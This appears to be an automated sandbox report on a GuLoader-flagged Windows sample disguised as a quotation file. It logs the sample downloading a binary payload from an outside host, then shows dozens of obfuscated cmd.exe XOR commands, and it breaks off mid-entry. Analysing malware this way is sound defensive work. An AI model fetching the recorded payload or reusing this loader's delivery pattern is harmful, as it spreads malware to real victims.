                                                                                                                Data Ascii: { "geoplugin_request":"102.129.152.223", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49760 | 102.65.21.26 | 443 | 1412 | C:\Users\user\Desktop\z1Quotation.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 10:04:59 UTC | 175 | OUT | GET /FrKSUMZ203.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: telesavers.co.za
Cache-Control: no-cache
2024-09-30 10:05:00 UTC | 249 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:05:00 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Mon, 30 Sep 2024 05:20:19 GMT
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream


                                                                                                                Target ID:0
                                                                                                                Start time:06:02:22
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\z1Quotation.scr.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.33493748290.0000000000637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.33493748290.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.33493748290.0000000000698000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.33495375188.0000000006463000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "250^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:3
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:4
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "244^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:5
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:6
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "227^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:7
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:8
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "255^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:9
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:10
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "244^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:11
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:12
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "253^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:13
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:14
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "130^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:15
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:16
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "131^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:17
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:18
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "139^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:19
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:20
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "139^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:21
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:22
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "242^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:23
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:24
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "195^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:25
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:26
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "212^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:27
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:28
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "208^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:29
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:30
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "197^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:31
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:32
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "212^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:33
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:34
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "247^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:35
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:36
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:37
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:38
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "221^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:39
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:40
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "212^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:41
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:42
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "240^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:43
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:44
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "153^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:45
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:46
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "220^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:47
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:48
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:49
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:50
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
